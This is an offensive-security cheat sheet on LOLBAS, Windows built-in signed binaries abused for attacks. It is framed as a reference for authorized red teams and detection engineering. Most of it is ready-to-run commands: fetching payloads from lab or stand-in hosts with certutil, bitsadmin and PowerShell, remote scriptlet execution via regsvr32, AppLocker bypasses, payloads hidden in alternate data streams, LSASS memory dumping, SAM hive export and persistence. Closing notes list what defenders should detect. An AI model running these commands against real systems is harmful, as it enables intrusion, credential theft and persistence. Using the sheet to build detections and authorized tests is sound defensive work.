LOLBAS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: LOLBin / GTFOBins Browser
OVERVIEW#
LOLBAS = Living Off The Land Binaries, Scripts and Libraries: signed, built-in Windows tools abused for download, execution, bypass, or persistence. Index: lolbas-project.github.io. This is a defensive detection reference and authorized red-team aide. Categories below map to real-world TTPs (MITRE ATT&CK).
DOWNLOAD (INGRESS TOOL TRANSFER)#
certutil -urlcache -f http://x/a.exe a.exe # Classic download certutil -verifyctl -f http://x/a.exe # Alt download bitsadmin /transfer j /download http://x/a a.exe curl http://x/a.exe -o a.exe # curl.exe (built-in) powershell -c "iwr http://x/a -o a.exe" # Invoke-WebRequest findstr /V /L W3AllLov http://x/file # UNC/URL fetch trick # Others: esentutl.exe, makecab.exe, replace.exe, expand.exe
EXECUTION (PROXY EXEC)#
rundll32 shell32.dll,Control_RunDLL a.dll # DLL exec
regsvr32 /s /u /i:http://x/a.sct scrobj.dll # Squiblydoo (remote sct)
mshta http://x/a.hta # HTA exec
mshta vbscript:Close(Execute("...")) # Inline vbscript
wmic process call create "cmd /c ..." # WMI exec
msbuild.exe a.csproj # Inline C# task exec
installutil /logfile= /U a.dll # .NET installer abuse
# Others: cmstp.exe, ieexec.exe, pcalua.exe, forfiles.exe
SCRIPT ENGINES#
cscript //nologo a.vbs # VBScript wscript a.js # JScript powershell -ep bypass -f a.ps1 # PowerShell powershell -enc <base64> # Encoded command
AWL / DEFENSE BYPASS#
# AppLocker / WDAC bypass candidates (signed, often allowed): InstallUtil.exe, MSBuild.exe, regsvcs.exe, regasm.exe, presentationhost.exe, dnx.exe, rcsi.exe, wsl.exe # Alternate data streams to hide payloads: type payload.exe > legit.txt:hidden.exe wmic process call create "C:\path\legit.txt:hidden.exe"
CREDENTIAL / DATA ACCESS#
# LSASS dump via signed tools (heavily monitored): rundll32 comsvcs.dll,MiniDump <lsass-pid> out.dmp full # Registry hive export: reg save HKLM\SAM sam.hiv && reg save HKLM\SYSTEM sys.hiv # Vault / DPAPI: vaultcmd, cmdkey /list
RECON (NATIVE)#
whoami /all # Token, groups, privileges net user /domain # Domain users net group "Domain Admins" /domain # Group membership nltest /dclist:corp.lu # DCs systeminfo # Patch level / OS tasklist /svc # Processes + services wmic qfe list # Hotfixes installed
PERSISTENCE (NATIVE)#
schtasks /create /tn t /tr "cmd /c ..." /sc onlogon reg add HKCU\...\Run /v x /d "cmd /c ..." # Run key # WMI event subscription (fileless persistence) via wmic/PowerShell # Service creation: sc create svc binPath= "..."
EXAMPLES#
# Download + fileless exec chain (blue-team detection target) certutil -urlcache -f http://10.10.10.5/a.exe %TEMP%\a.exe rundll32 %TEMP%\a.exe,EntryPoint # Squiblydoo remote scriptlet execution regsvr32 /s /n /u /i:http://10.10.10.5/x.sct scrobj.dll # LSASS minidump with a signed OS DLL (expect EDR alert) rundll32 comsvcs.dll,MiniDump 660 C:\temp\l.dmp full
NOTES#
- LOLBAS abuse is prized because binaries are Microsoft-signed and often allowlisted - detection must be behavioral, not signature - Highest-value detections: certutil URL fetch, regsvr32 scrobj + network, rundll32 comsvcs MiniDump, mshta/wscript spawning children - WDAC/AppLocker in enforce mode + Microsoft's recommended block rules kills most of these paths - comsvcs MiniDump against lsass is a top EDR trigger; use for detection-engineering test cases, not stealth - Cross-reference with EDR-EVASION.txt and DEFENDER-KQL.txt - For FS clients, this drives application-control + Sysmon coverage gaps in a DORA/NIS2 hardening assessment